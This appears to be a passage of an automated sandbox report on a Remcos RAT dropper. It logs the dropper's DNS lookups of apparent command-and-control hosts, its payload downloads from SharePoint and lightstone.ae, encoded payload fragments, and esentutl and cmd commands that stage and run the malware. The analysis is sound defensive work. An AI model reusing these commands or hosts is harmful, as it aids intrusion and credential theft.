Nov 26, 2024 08:12:12.122469902 CET | 1.1.1.1 | 192.168.2.9 | 0x5724 | No error (0) | alfanar01.sharepoint.com | 13828-ipv4v6e.clump.dprodmgd104.aa-rt.sharepoint.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 08:12:12.122469902 CET | 1.1.1.1 | 192.168.2.9 | 0x5724 | No error (0) | 13828-ipv4v6e.clump.dprodmgd104.aa-rt.sharepoint.com | 189749-ipv4v6e.farm.dprodmgd104.aa-rt.sharepoint.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 08:12:12.122469902 CET | 1.1.1.1 | 192.168.2.9 | 0x5724 | No error (0) | 189749-ipv4v6e.farm.dprodmgd104.aa-rt.sharepoint.com | 189749-ipv4v6e.farm.dprodmgd104.sharepointonline.com.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 08:12:12.122469902 CET | 1.1.1.1 | 192.168.2.9 | 0x5724 | No error (0) | 189749-ipv4v6.farm.dprodmgd104.aa-rt.sharepoint.com.dual-spo-0005.spo-msedge.net | dual-spo-0005.spo-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 08:12:12.122469902 CET | 1.1.1.1 | 192.168.2.9 | 0x5724 | No error (0) | dual-spo-0005.spo-msedge.net | | 13.107.136.10 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:12:12.122469902 CET | 1.1.1.1 | 192.168.2.9 | 0x5724 | No error (0) | dual-spo-0005.spo-msedge.net | | 13.107.138.10 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:12:20.395488977 CET | 1.1.1.1 | 192.168.2.9 | 0xd48c | No error (0) | lightstone.ae | | 162.19.139.102 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:12:29.074512959 CET | 1.1.1.1 | 192.168.2.9 | 0x55aa | No error (0) | pentester0.accesscam.org | | 103.186.117.159 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:12:41.401722908 CET | 1.1.1.1 | 192.168.2.9 | 0xfbd8 | No error (0) | pentester0.accesscam.org | | 103.186.117.159 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:12:51.738557100 CET | 1.1.1.1 | 192.168.2.9 | 0x48ee | No error (0) | honeypotresearchteam.duckdns.org | | 103.186.117.159 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:14:22.956145048 CET | 1.1.1.1 | 192.168.2.9 | 0x82a8 | No error (0) | honeypotresearchteam.duckdns.org | | 103.186.117.159 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:14:46.171729088 CET | 1.1.1.1 | 192.168.2.9 | 0x7185 | No error (0) | pentester0.accesscam.org | | 103.186.117.159 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:31.866789103 CET | 1.1.1.1 | 192.168.2.9 | 0x766b | No error (0) | pentester0.accesscam.org | | 103.186.117.159 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:54.466357946 CET | 1.1.1.1 | 192.168.2.9 | 0x66d5 | No error (0) | honeypotresearchteam.duckdns.org | | 103.186.117.159 | A (IP address) | IN (0x0001) | false
                                                                      • alfanar01-my.sharepoint.com
                                                                      • lightstone.ae
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49723 | 13.107.136.10 | 443 | 7280 | C:\Users\user\Desktop\jlPBMMQbXC.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:12:14 UTC | 265 | OUT | GET /:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1 HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                      Host: alfanar01-my.sharepoint.com
2024-11-26 07:12:15 UTC | 3663 | IN | HTTP/1.1 302 Found
                                                                      Cache-Control: private
                                                                      Content-Length: 180
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Location: /personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1
                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: FedAuth=[TRUNCATED]
                                                                      X-NetworkStatistics: 0,525568,0,0,140,0,26331,60
                                                                      X-SharePointHealthScore: 1
                                                                      X-MS-SPO-CookieValidator: iP4VXGg0NAUDRphrqKFS+VC3tEOGdNujyhYhdd6n21RjULHb5PPOPBF7JH2s1wqfmSDkMd3juv3/6G9DY4ktOoo44Vp/oO9XMb/a1JpIYPbxqZovxnomJNXUf0+EpwuGSjs8DNJ+O8LgPiXxkXWhK0f4a3ietj9BMMbSYrbapIsJLdI4bR61xEf8o+n6NbY3K4VcW8BtJNLg8idBHAWE9YEeXJczY2MNBJGpILG7/s1Q85ekOLQUZr09Nig9F8bR1F/E7YPWSYrlDxpc+HpMYgbFzpDDB42BvANtaEKt0HSI/BDIQ1x6ceGgA2CojNHB8xhV2vO1N9YmighH5ndVnQ==
                                                                      X-AspNet-Version: 4.0.30319
                                                                      X-DataBoundary: EU
                                                                      X-1DSCollectorUrl: https://eu-mobile.events.data.microsoft.com/OneCollector/1.0/
                                                                      X-AriaCollectorURL: https://eu-mobile.events.data.microsoft.com/Collector/3.0
                                                                      SPRequestGuid: d19767a1-70f9-a000-70dc-6b88e0bc558d
                                                                      request-id: d19767a1-70f9-a000-70dc-6b88e0bc558d
                                                                      MS-CV: oWeX0flwAKBw3GuI4LxVjQ.0
                                                                      Alt-Svc: h3=":443";ma=86400
                                                                      Report-To: {"group":"network-errors","max_age":7200,"endpoints":[{"url":"https://spo.nel.measure.office.net/api/report?tenantId=91742063-fccc-4cba-b34b-69be54e484e8&desusertionEndpoint=Edge-Prod-EWR31r5c&frontEnd=AFD&RemoteIP=8.46.123.0"}]}
                                                                      NEL: {"report_to":"network-errors","max_age":7200,"success_fraction":0.001,"failure_fraction":1.0}
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      X-FRAME-OPTIONS: SAMEORIGIN
                                                                      Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com teams.cloud.microsoft *.office365.com goals.cloud.microsoft *.powerapps.com app.powerbi.com *.yammer.com engage.cloud.microsoft word.cloud.microsoft excel.cloud.microsoft powerpoint.cloud.microsoft *.officeapps.live.com *.office.com *.microsoft365.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com onedrive.live.com *.onedrive.live.com securebroker.sharepointonline.com;
                                                                      SPRequestDuration: 269
                                                                      SPIisLatency: 4
                                                                      X-Powered-By: ASP.NET
                                                                      MicrosoftSharePointTeamServices: 16.0.0.25430
                                                                      X-Content-Type-Options: nosniff
                                                                      X-MS-InvokeApp: 1; RequireReadOnly
                                                                      X-Cache: CONFIG_NOCACHE
                                                                      X-MSEdge-Ref: Ref A: 05748EF33E884D8AAFC9C39AD45AA39D Ref B: EWR311000105037 Ref C: 2024-11-26T07:12:14Z
                                                                      Date: Tue, 26 Nov 2024 07:12:14 GMT
                                                                      Connection: close
2024-11-26 07:12:15 UTC | 180 | IN | Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1">here</a>.</h2></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49729 | 13.107.136.10 | 443 | 7280 | C:\Users\user\Desktop\jlPBMMQbXC.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:12:16 UTC | 1385 | OUT | GET /personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1 HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                      Host: alfanar01-my.sharepoint.com
Cookie: FedAuth=[TRUNCATED]
2024-11-26 07:12:17 UTC | 4809 | IN | HTTP/1.1 200 OK
                                                                      Cache-Control: private,max-age=0
                                                                      Content-Length: 1072224
                                                                      Content-Type: application/octet-stream
                                                                      Expires: Mon, 11 Nov 2024 07:12:17 GMT
                                                                      Last-Modified: Mon, 16 Sep 2024 04:41:15 GMT
                                                                      Accept-Ranges: bytes
                                                                      ETag: "{DF8B01B7-6905-4FEF-AD81-FB2E99A24903},2"
                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: FedAuth=[TRUNCATED]
Set-Cookie: FedAuth=[TRUNCATED]
                                                                      X-NetworkStatistics: 0,525568,0,0,138,0,26343,60
                                                                      X-SharePointHealthScore: 3
                                                                      ResourceTag: rt:DF8B01B7-6905-4FEF-AD81-FB2E99A24903@00000000002
                                                                      Content-Disposition: attachment; filename*=utf-8''233%5fSelebzihtih; filename="233_Selebzihtih"
                                                                      X-Download-Options: noopen
                                                                      Public-Extension: http://schemas.microsoft.com/repl-2
                                                                      X-DataBoundary: EU
                                                                      X-1DSCollectorUrl: https://eu-mobile.events.data.microsoft.com/OneCollector/1.0/
                                                                      X-AriaCollectorURL: https://eu-mobile.events.data.microsoft.com/Collector/3.0
                                                                      SPRequestGuid: d29767a1-8095-a000-c2b2-b5b965e43a56
                                                                      request-id: d29767a1-8095-a000-c2b2-b5b965e43a56
                                                                      MS-CV: oWeX0pWAAKDCsrW5ZeQ6Vg.0
                                                                      Alt-Svc: h3=":443";ma=86400
                                                                      Report-To: {"group":"network-errors","max_age":7200,"endpoints":[{"url":"https://spo.nel.measure.office.net/api/report?tenantId=91742063-fccc-4cba-b34b-69be54e484e8&desusertionEndpoint=Edge-Prod-EWR31r5b&frontEnd=AFD&RemoteIP=8.46.123.0"}]}
                                                                      NEL: {"report_to":"network-errors","max_age":7200,"success_fraction":0.001,"failure_fraction":1.0}
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      X-FRAME-OPTIONS: SAMEORIGIN
                                                                      Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com teams.cloud.microsoft *.office365.com goals.cloud.microsoft *.powerapps.com app.powerbi.com *.yammer.com engage.cloud.microsoft word.cloud.microsoft excel.cloud.microsoft powerpoint.cloud.microsoft *.officeapps.live.com *.office.com *.microsoft365.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com onedrive.live.com *.onedrive.live.com securebroker.sharepointonline.com;
                                                                      SPRequestDuration: 390
                                                                      SPIisLatency: 1
                                                                      X-Powered-By: ASP.NET
                                                                      MicrosoftSharePointTeamServices: 16.0.0.25430
                                                                      X-Content-Type-Options: nosniff
                                                                      X-MS-InvokeApp: 1; RequireReadOnly
                                                                      X-Cache: CONFIG_NOCACHE
                                                                      X-MSEdge-Ref: Ref A: 662CC01130A04806A28BD6E7207688DF Ref B: EWR311000104033 Ref C: 2024-11-26T07:12:17Z
                                                                      Date: Tue, 26 Nov 2024 07:12:17 GMT
                                                                      Connection: close
                                                                      Data Ascii: TrCg8OA3M2vFvNDG1PK2VxzBPwWERZg1Uj1/FCeOagGm4FDa+IiPhCT8D9gRsdYSPaJHMV67Uw+UmRMzz4izzej/8Kdko7G7NSWzStGhsHSdjWTAWx4+j6kVIZcRwXfuRh8BEmNYVNIM5EJ5JUpVrefAVpM2fBTgXJkeHoSW3AeOEvrZ75MFfq/MR0vMKVGOCeKyQCjhznAWn3UOPHQarrA1HS178hkTxnRYv8Haa8+5JGrtoVztGKL8qq5Fri3
                                                                      2024-11-26 07:12:18 UTC8192INData Raw: 45 70 69 77 71 4c 34 6e 7a 35 6e 37 68 50 54 66 5a 4c 32 2f 49 6d 35 48 4d 57 2f 2f 4b 63 7a 65 67 42 54 63 47 63 79 66 6a 55 69 68 54 33 49 5a 77 33 59 4c 63 35 77 7a 74 50 59 64 65 38 31 70 62 70 6a 31 55 64 6b 68 6b 59 45 72 44 2f 4d 31 4b 36 52 4f 2f 32 7a 35 73 79 4e 70 4c 42 42 51 44 61 61 76 4e 34 77 30 44 77 67 6d 46 54 55 69 58 52 7a 4e 43 42 4c 71 73 4f 61 6d 77 4d 2b 48 55 71 66 30 62 4e 33 52 6a 62 79 6c 76 48 4c 66 56 6f 46 4d 74 6c 61 37 37 35 75 72 79 55 31 48 43 57 68 77 35 4e 51 43 52 38 76 69 51 6f 69 51 61 64 52 36 4c 4c 57 4f 53 4c 70 31 37 6a 6b 65 4a 67 34 4a 4b 76 65 56 68 55 42 46 31 2f 70 39 53 2b 64 52 33 64 61 49 4c 33 6a 6b 37 55 36 6a 49 6e 4a 31 65 64 72 69 45 4b 42 43 5a 62 44 6e 33 75 4a 4c 2f 32 73 62 39 75 75 5a 4d 45 7a
                                                                      Data Ascii: EpiwqL4nz5n7hPTfZL2/Im5HMW//KczegBTcGcyfjUihT3IZw3YLc5wztPYde81pbpj1UdkhkYErD/M1K6RO/2z5syNpLBBQDaavN4w0DwgmFTUiXRzNCBLqsOamwM+HUqf0bN3RjbylvHLfVoFMtla775uryU1HCWhw5NQCR8viQoiQadR6LLWOSLp17jkeJg4JKveVhUBF1/p9S+dR3daIL3jk7U6jInJ1edriEKBCZbDn3uJL/2sb9uuZMEz
                                                                      2024-11-26 07:12:18 UTC8192INData Raw: 55 4e 45 79 77 43 6e 73 54 79 73 41 4b 48 55 68 44 38 4a 51 75 61 4a 2f 33 6f 5a 64 6b 45 34 6a 50 66 38 30 34 31 65 6c 54 65 49 7a 71 70 79 43 35 46 42 53 65 4c 61 68 4d 6a 50 61 50 73 79 39 65 54 5a 78 4d 65 61 6d 6a 67 6d 74 62 70 6d 55 2f 43 65 53 69 42 41 66 31 7a 55 6d 55 6f 76 48 76 57 6a 31 6a 77 6a 4c 30 4b 5a 76 78 54 51 6f 53 68 79 4f 70 62 42 37 62 31 4b 63 4c 4a 34 76 4b 70 69 33 71 61 35 2b 79 5a 52 53 54 49 50 72 75 39 57 34 6d 34 61 59 43 56 4a 4f 4d 4d 67 71 51 6d 71 47 65 6f 56 55 4f 67 7a 75 31 4c 79 7a 6c 70 56 4a 68 7a 73 50 2f 42 6c 58 62 51 72 52 36 77 37 48 6c 4d 39 56 2b 75 33 52 47 63 6f 36 69 6f 6d 4b 53 52 45 69 4f 74 38 4b 47 30 50 36 2f 73 47 36 34 6f 63 38 77 38 72 73 68 63 4e 43 59 38 71 46 4c 44 75 77 53 66 46 52 71 6c 73
                                                                      Data Ascii: UNEywCnsTysAKHUhD8JQuaJ/3oZdkE4jPf8041elTeIzqpyC5FBSeLahMjPaPsy9eTZxMeamjgmtbpmU/CeSiBAf1zUmUovHvWj1jwjL0KZvxTQoShyOpbB7b1KcLJ4vKpi3qa5+yZRSTIPru9W4m4aYCVJOMMgqQmqGeoVUOgzu1LyzlpVJhzsP/BlXbQrR6w7HlM9V+u3RGco6iomKSREiOt8KG0P6/sG64oc8w8rshcNCY8qFLDuwSfFRqls
                                                                      2024-11-26 07:12:18 UTC8192INData Raw: 70 56 72 30 68 31 50 6f 44 47 59 48 61 66 54 46 6a 44 65 4f 45 68 63 6e 73 72 68 31 34 59 53 56 62 6a 34 33 62 67 43 7a 53 70 63 38 64 37 36 53 6e 61 37 50 6d 63 45 2b 6c 34 64 6e 31 44 38 51 76 35 69 78 4d 41 31 59 30 6e 6a 46 2b 2b 2f 32 36 47 4b 4d 6b 6d 56 70 57 77 4b 65 4c 51 36 73 45 65 47 32 67 46 7a 37 7a 67 54 39 78 76 53 69 62 35 71 4f 75 58 31 6f 39 41 4c 65 49 31 47 39 35 53 72 7a 46 4e 38 53 7a 73 6f 4a 59 4a 77 4b 48 56 77 51 47 54 74 38 6c 2b 34 7a 39 6f 71 46 30 43 65 2b 30 4d 31 44 43 72 57 51 50 30 6f 4e 36 2b 67 4e 53 44 67 6e 72 78 2b 47 45 51 79 65 47 39 6f 78 61 76 4f 47 54 42 4c 61 5a 31 76 4a 4a 79 70 4e 49 38 61 50 4e 44 75 42 72 73 75 69 44 33 48 32 68 77 69 6b 55 4f 57 4d 42 2f 51 41 49 79 47 53 6d 39 32 4d 39 4b 77 4b 6e 6b 39
                                                                      Data Ascii: pVr0h1PoDGYHafTFjDeOEhcnsrh14YSVbj43bgCzSpc8d76Sna7PmcE+l4dn1D8Qv5ixMA1Y0njF++/26GKMkmVpWwKeLQ6sEeG2gFz7zgT9xvSib5qOuX1o9ALeI1G95SrzFN8SzsoJYJwKHVwQGTt8l+4z9oqF0Ce+0M1DCrWQP0oN6+gNSDgnrx+GEQyeG9oxavOGTBLaZ1vJJypNI8aPNDuBrsuiD3H2hwikUOWMB/QAIyGSm92M9KwKnk9
                                                                      2024-11-26 07:12:18 UTC8192INData Raw: 75 37 5a 35 59 67 30 77 68 2f 64 41 69 6e 66 55 61 32 49 48 71 4a 6f 6d 43 52 5a 77 49 63 57 74 51 6e 75 4a 48 63 30 37 52 52 71 2b 4d 6f 37 55 33 4d 70 38 30 36 48 73 74 51 73 32 70 79 59 38 57 4a 55 52 58 71 78 6d 4f 56 78 45 55 35 62 50 36 69 4d 36 71 37 59 46 55 59 77 63 32 66 6e 45 67 69 42 63 4d 43 39 76 4a 4c 5a 4f 62 41 74 6a 42 43 4e 36 30 75 6e 39 2b 73 55 54 4f 6f 69 56 57 46 63 33 37 51 52 34 75 5a 34 4b 6a 6b 6c 64 4c 64 58 38 57 70 6f 64 43 41 68 38 38 73 57 30 43 32 65 45 4d 36 42 42 68 55 4c 6f 30 30 6e 79 6e 45 46 4a 52 50 4b 4c 76 70 32 4e 37 63 6b 6e 6a 6c 49 49 6f 4d 64 56 75 6b 55 2b 47 59 57 5a 61 30 52 36 2b 73 41 68 77 2b 4f 30 58 62 66 4b 39 4a 57 37 6b 32 48 39 79 62 46 36 69 76 6b 55 4f 6f 6f 49 68 44 65 67 79 56 79 73 30 73 68
                                                                      Data Ascii: u7Z5Yg0wh/dAinfUa2IHqJomCRZwIcWtQnuJHc07RRq+Mo7U3Mp806HstQs2pyY8WJURXqxmOVxEU5bP6iM6q7YFUYwc2fnEgiBcMC9vJLZObAtjBCN60un9+sUTOoiVWFc37QR4uZ4KjkldLdX8WpodCAh88sW0C2eEM6BBhULo00nynEFJRPKLvp2N7cknjlIIoMdVukU+GYWZa0R6+sAhw+O0XbfK9JW7k2H9ybF6ivkUOooIhDegyVys0sh
                                                                      2024-11-26 07:12:18 UTC8192INData Raw: 53 6a 31 42 4b 6c 72 77 56 52 53 39 73 52 51 32 66 70 4b 35 71 59 6c 33 58 69 76 38 4b 46 70 42 50 45 70 55 71 34 6e 74 76 35 72 53 6e 31 76 73 50 56 41 54 70 57 6a 6e 43 47 4c 4c 2f 50 33 76 47 47 54 41 36 47 73 63 57 77 33 32 7a 4f 56 63 6a 68 77 32 39 34 73 38 2f 72 47 48 78 76 4b 57 73 7a 51 2f 55 75 46 34 46 62 78 6c 56 74 6f 76 68 6b 4a 63 52 38 75 66 56 4b 55 7a 4a 68 50 70 5a 36 38 45 42 37 2b 55 56 61 2f 68 7a 34 6b 33 6b 6f 58 47 70 7a 6e 43 77 6a 4b 72 75 73 70 2b 64 49 57 55 6c 69 2f 64 6b 4e 77 73 48 30 6c 5a 46 76 56 41 32 4d 54 47 62 42 6f 4c 61 6c 57 36 78 65 6c 53 32 59 44 57 38 6d 79 66 75 70 4e 4d 57 63 72 33 41 50 32 49 50 54 47 67 6e 56 78 63 59 65 76 4b 76 75 34 66 52 33 32 57 72 4d 75 2f 79 54 74 79 6f 58 54 6e 74 42 67 53 2b 42 57
                                                                      Data Ascii: Sj1BKlrwVRS9sRQ2fpK5qYl3Xiv8KFpBPEpUq4ntv5rSn1vsPVATpWjnCGLL/P3vGGTA6GscWw32zOVcjhw294s8/rGHxvKWszQ/UuF4FbxlVtovhkJcR8ufVKUzJhPpZ68EB7+UVa/hz4k3koXGpznCwjKrusp+dIWUli/dkNwsH0lZFvVA2MTGbBoLalW6xelS2YDW8myfupNMWcr3AP2IPTGgnVxcYevKvu4fR32WrMu/yTtyoXTntBgS+BW


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      2192.168.2.949746162.19.139.1024437280C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-26 07:12:22 UTC | 168 | OUT | GET /image/233_Selebzihtih HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                      Host: lightstone.ae
                                                                      2024-11-26 07:12:22 UTC | 210 | IN | HTTP/1.1 200 OK
                                                                      Date: Tue, 26 Nov 2024 07:12:22 GMT
                                                                      Server: Apache
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, close
                                                                      Last-Modified: Mon, 16 Sep 2024 04:46:00 GMT
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 1072224



                                                                      Target ID:0
                                                                      Start time:02:12:08
                                                                      Start date:26/11/2024
                                                                      Path:C:\Users\user\Desktop\jlPBMMQbXC.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\jlPBMMQbXC.exe"
                                                                      Imagebase:0x400000
                                                                      File size:1'243'648 bytes
                                                                      MD5 hash:A27B6DE588AD4D4C0D6E0C656E580F4E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:02:12:25
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hizbeleS.cmd" "
                                                                      Imagebase:0xc50000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:02:12:25
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff70f010000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:02:12:25
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                      Imagebase:0x460000
                                                                      File size:352'768 bytes
                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:02:12:26
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jlPBMMQbXC.exe /d C:\\Users\\Public\\Libraries\\Selebzih.PIF /o
                                                                      Imagebase:0x460000
                                                                      File size:352'768 bytes
                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:02:12:26
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\SysWOW64\SndVol.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\System32\SndVol.exe
                                                                      Imagebase:0xa0000
                                                                      File size:226'712 bytes
                                                                      MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:9
                                                                      Start time:02:12:27
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff70f010000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:02:12:37
                                                                      Start date:26/11/2024
                                                                      Path:C:\Users\Public\Libraries\Selebzih.PIF
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\Public\Libraries\Selebzih.PIF"
                                                                      Imagebase:0x400000
                                                                      File size:1'243'648 bytes
                                                                      MD5 hash:A27B6DE588AD4D4C0D6E0C656E580F4E
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:Borland Delphi
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 63%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:02:12:39
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\SysWOW64\SndVol.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\System32\SndVol.exe
                                                                      Imagebase:0xa0000
                                                                      File size:226'712 bytes
                                                                      MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:02:12:46
                                                                      Start date:26/11/2024
                                                                      Path:C:\Users\Public\Libraries\Selebzih.PIF
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\Public\Libraries\Selebzih.PIF"
                                                                      Imagebase:0x400000
                                                                      File size:1'243'648 bytes
                                                                      MD5 hash:A27B6DE588AD4D4C0D6E0C656E580F4E
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:15
                                                                      Start time:02:12:47
                                                                      Start date:26/11/2024
                                                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\System32\colorcpl.exe
                                                                      Imagebase:0x730000
